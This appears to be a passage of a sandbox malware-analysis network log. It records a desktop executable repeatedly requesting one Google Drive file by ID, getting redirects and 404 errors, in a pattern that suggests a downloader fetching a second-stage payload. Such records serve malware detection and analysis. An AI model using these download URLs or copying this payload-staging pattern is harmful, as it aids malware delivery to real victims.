                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:03 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-pygP1nTF1O9AEJIRsT2F2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          53 | 192.168.11.20 | 49799 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:37:04 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:04 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC7Wtk9gHFrryruSlyIDc4g21IdKj_2V246s1RBlhnI9JYQz1PfjSiIMqY8kmnX-JhxE
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:04 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-z0XLASyq9bl-uqtYbMOkmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:37:04 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="D7YUg0RCN4080epd-Fdecw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          54 | 192.168.11.20 | 49800 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:37:14 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:14 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:14 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-RrmexLNZZp86gaxtuYPiyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          55 | 192.168.11.20 | 49801 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:37:15 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:15 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgT3RiN9ZxCtdSWdsf14TfbGiPZL38YNsLWgeMIBhPPTBA-DwoktkUs6bz4Xg-LUbdT8y5WTUBk
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:15 GMT
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-drEtOWCVekWEL3C9TKVEBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:37:15 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Vu57-Min1hAnV7md-2XjdA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          56 | 192.168.11.20 | 49802 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:37:25 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:26 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:25 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-a2Zzm39AqmIKJ1eyNA34YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          57 | 192.168.11.20 | 49803 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:37:26 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:26 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC5qtrPtrf2Pn6Vn6erPGfFCrkflvGsQd_kdKlUnUPCLe7jrcNdZIus4srMDKxPmQQYP
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:26 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-jvvcYuxu1kv3cttYFuUR5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:37:26 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cIr3XIzObk3uPRRkprPCSw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          58 | 192.168.11.20 | 49804 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:37:36 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:37 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:37 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-YkgMHx4yfvmk11Nnww6QeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          59 | 192.168.11.20 | 49805 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:37:37 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
2025-01-10 14:37:37 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgQG8UH1SaxGn2miBV8IRlCvItB0d_hZKuhnxm_mgyjbcBS_pGVYwi70r53PS1f8OKE9
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:37 GMT
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-SNSH-tzagvYScy3jlsUV8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
2025-01-10 14:37:37 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oelNRJHAaQLgBou2MbmvlA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.11.20 | 49806 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:37:48 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
2025-01-10 14:37:48 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:48 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-aRWrqBkoo-9qfyypsOtedw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.11.20 | 49807 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
Timestamp | Bytes transferred | Direction | Data
